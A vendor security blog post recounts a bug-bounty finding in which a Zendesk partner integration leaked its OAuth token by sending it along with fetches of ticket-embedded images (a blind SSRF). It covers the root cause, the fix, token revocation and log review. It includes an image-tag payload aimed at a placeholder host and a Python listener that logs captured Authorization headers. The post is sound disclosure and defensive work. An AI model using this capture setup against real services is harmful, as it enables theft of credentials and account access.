SECURITY
FEB 10, 2021
Collaboration Defeats Third-Party Risk
In modern organizations, third-party risk is always present. It’s nearly impossible to avoid, and challenging to detect and mitigate. We wanted to share a few details around a recent occurrence at Gemini that highlights the opaque nature of third-party risk and underscores the importance of cross-team and cross-company collaboration.
What is third-party risk? Simply put, it is the additional attack surface created by the use of software and services not owned by your company. Does your code include dependencies that your developers didn't write? That's third-party risk. How many SaaS products do your HR and recruiting teams use? That's third-party risk.
Third-party risk is often seen as just a part of doing business, because it is. You would be hard-pressed to find companies that build their own custom recruiting software purely for internal use. That's because the benefit of integrating third-party products, despite the cost of the service and the added risk, still outweighs the time, money, and effort required to build and maintain the "wheel" you would otherwise have to reinvent.
So, if third-party risk is a necessary evil in order to do business in 2021, how do you get a handle on it? At Gemini, we determine the inherent risk of third-party service providers and group them into tiers based on our Procurement and Vendor Management Policy. Gemini assesses certain tiers of vendors through a risk assessment process that may include review of relevant certification documents, questionnaires, and technical reports. The ultimate goal is to understand any potential risks and if or how they can be mitigated.
Detecting actual threats and truly understanding risk can be challenging. As we will explain, sometimes when it comes to third-party risk, more than three are invited to the party. Here we discuss how Gemini collaborated with multiple internal and external parties to detect, identify, and quickly resolve a recent issue.
Detecting and Assessing the Threat
It started with a bug report that came in through our private bug bounty program. In the submission, the researcher reported they had found a “Blind XSS” that disclosed a Zendesk administrator’s Authorization token.
As we began triaging the report, we noticed several interesting details:
- The proof of concept provided by the researcher did not include a cross-site scripting (XSS) payload, just an HTML img tag with a Burp Collaborator URL as the src attribute.
- The same-origin policy would prevent the browser of the user viewing the payload from sending the Authorization header in the request to fetch the image.
- The User-Agent in the request was ‘python-requests/2.22.0’.
We quickly realized that this wasn't a blind XSS; it was a blind SSRF! We attempted to reproduce the issue following the steps provided by the researcher but were initially unsuccessful.
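To make the triage details above concrete, here is a minimal sketch of the out-of-band technique the report relied on. The "payload" is nothing more than an image tag pointing at a server the researcher controls, and a small listener on that server records whatever credentials arrive when something fetches the image; the hostname, port, and handler below are illustrative, not the researcher's actual Burp Collaborator setup.

```python
# Minimal sketch of an out-of-band (blind) probe: the ticket body contains
# only an image tag pointing at a server we control, and this listener logs
# any Authorization header presented by whatever fetches the "image".
# The hostname and port are placeholders for illustration.
from http.server import BaseHTTPRequestHandler, HTTPServer

PAYLOAD = '<img src="https://oob-probe.example.com/pixel.png">'  # submitted in the ticket

class ProbeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        auth = self.headers.get("Authorization")
        ua = self.headers.get("User-Agent")
        print(f"callback from {self.client_address[0]} UA={ua} Authorization={auth}")
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ProbeHandler).serve_forever()
```

A browser rendering that ticket would never attach a Zendesk Authorization header to a cross-origin image request, which is why the python-requests User-Agent pointed to a server-side fetch rather than a victim's browser.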
We contacted the researcher and worked closely with them while we continued attempting to reproduce the issue. Internally, we notified our Threat Detection and Response (TDR) team to help coordinate communication and attempt to determine if the issue had been exploited by any malicious parties. The Customer Support (CS) team was also notified to provide expertise and administrative access to our Zendesk account.
About 30 minutes after initially attempting to reproduce the issue, we received a response from our earlier testing. Sure enough, it contained what appeared to be an Authorization token. The good news was that we were able to reproduce the reported issue, but why was there such a long delay?
Working With External Partners
After determining that the token contained in the response was a Zendesk OAuth token, we quickly disabled it — just in case the token had been accessed by anyone other than the researcher we were working with. We were also able to identify the owner of the token: a Zendesk integration partner. Our CS team explained that they use this integration to help track their performance within Zendesk.
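For readers curious what "disabling the token" looks like in practice, the sketch below lists and revokes OAuth tokens through Zendesk's OAuth Tokens API. The subdomain, admin credentials, and token ID are placeholders, and the endpoint paths reflect our reading of Zendesk's documentation rather than the exact steps we took.

```python
# Hedged sketch of revoking a leaked Zendesk OAuth token via the
# OAuth Tokens API; subdomain, credentials, and token ID are placeholders.
import requests

SUBDOMAIN = "yourcompany"                                      # hypothetical Zendesk subdomain
ADMIN_AUTH = ("admin@example.com/token", "ZENDESK_API_TOKEN")  # email/token + API token

def list_oauth_tokens():
    """Return all OAuth tokens issued for the account."""
    resp = requests.get(
        f"https://{SUBDOMAIN}.zendesk.com/api/v2/oauth/tokens.json",
        auth=ADMIN_AUTH,
    )
    resp.raise_for_status()
    return resp.json()["tokens"]

def revoke_token(token_id):
    """Revoke a single OAuth token by ID."""
    resp = requests.delete(
        f"https://{SUBDOMAIN}.zendesk.com/api/v2/oauth/tokens/{token_id}.json",
        auth=ADMIN_AUTH,
    )
    resp.raise_for_status()
```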
Out of an abundance of caution, we immediately disabled the Zendesk partner integration and contacted the partner’s security team. The team promptly responded and quickly set a time to meet and discuss the details. We had a productive and efficient call, and within hours a fix had been rolled out. We also continued to communicate with the researcher who originally reported the issue.
Due Diligence and Root Cause Analysis
Once the fix was in place, we took a step back to better understand the issue. Based on discussions with the partner’s security team, our CS team, and a bit of research, we learned exactly how the issue presented itself. To put it succinctly, it was a flaw in a third-party integration to a third-party service used by Gemini.
Every 30 minutes or so, the service would authenticate to Gemini's Zendesk instance to read and parse any new support tickets. During the parsing process, the service would fetch URLs, images, and other assets that appeared in each ticket. The problem was that the "Authorization" header was set not only on authenticated API requests, but on every HTTP request the service made, including fetches of images embedded in tickets. As a result, an attacker could obtain the token by creating a support ticket that referenced an image hosted on a server they controlled. When the service attempted to fetch the image from the attacker-controlled server, it would send the Authorization header containing the token, which the attacker could then capture in their web server logs.
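The sketch below condenses that behavior into a few lines; the names, URLs, and token are illustrative and not the partner's actual code. The flaw boils down to attaching the Authorization header at the session level, so it rides along on every request the integration makes, while the fix amounts to attaching it only to requests bound for the Zendesk API host.

```python
# Illustrative sketch of the root cause; hostnames and the token are placeholders.
import requests
from urllib.parse import urlparse

ZENDESK_API = "https://yourcompany.zendesk.com/api/v2"  # placeholder subdomain
OAUTH_TOKEN = "integration-oauth-token"                  # placeholder token

# Flawed pattern: credentials set on the session are sent with EVERY request...
session = requests.Session()
session.headers["Authorization"] = f"Bearer {OAUTH_TOKEN}"

def fetch_ticket_assets(asset_urls):
    for url in asset_urls:
        # ...including fetches of attacker-controlled image URLs embedded in a
        # ticket, which is how the token leaked.
        session.get(url)

# Safer pattern: only attach credentials to requests bound for the API host.
def fetch_asset_safely(url):
    headers = {}
    if urlparse(url).hostname == urlparse(ZENDESK_API).hostname:
        headers["Authorization"] = f"Bearer {OAUTH_TOKEN}"
    return requests.get(url, headers=headers)
```

Scoping credentials to an allowlisted host, rather than to the HTTP client as a whole, is exactly the kind of "reduce the blast radius" measure we come back to below.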
We continued to work closely with the partner's security team as well as Zendesk in order to determine the entire scope of the leak. We obtained logs from multiple sources, both external and internal. We also worked closely with our TDR and CS teams to determine how the access token was used and whether any customer data was exposed. We were able to determine conclusively that the issue had not been exploited by anyone except the researcher who originally notified us. At this point, we were comfortable re-enabling the Zendesk partner integration so our CS team could continue to use the service.
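As a rough illustration of that log review, the sketch below flags any use of the leaked token that did not come from the partner's known address space or from the researcher. The log format, field names, and IP ranges are assumptions made for the example, not our actual tooling or data.

```python
# Hedged sketch of scoping the leak from access logs; the CSV format,
# field names, and IP ranges below are assumptions for illustration.
import csv
import ipaddress

PARTNER_NETS = [ipaddress.ip_network("203.0.113.0/24")]  # hypothetical partner ranges
RESEARCHER_IPS = {"198.51.100.7"}                         # hypothetical researcher IP

def suspicious_token_uses(log_path):
    """Yield log rows where the leaked token was presented by an unexpected source."""
    with open(log_path, newline="") as f:
        for row in csv.DictReader(f):
            ip = ipaddress.ip_address(row["source_ip"])   # assumed field name
            if str(ip) in RESEARCHER_IPS:
                continue
            if any(ip in net for net in PARTNER_NETS):
                continue
            yield row
```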
Third-party risk will often present itself in unexpected ways. It is not feasible to attempt to mitigate every eventuality. Be prepared for the unexpected, rely on your internal teams, hope for the best with external partners, and “reduce the blast radius” whenever possible.
While the root cause of this issue was not technically complicated, the multiple degrees of separation and the number of internal and external teams involved made for a challenging triage and response process. Despite this challenge, and with the help of some truly excellent external partners, this issue came to an efficient and safe conclusion.
Onward and Upward!
Gemini Product Security Team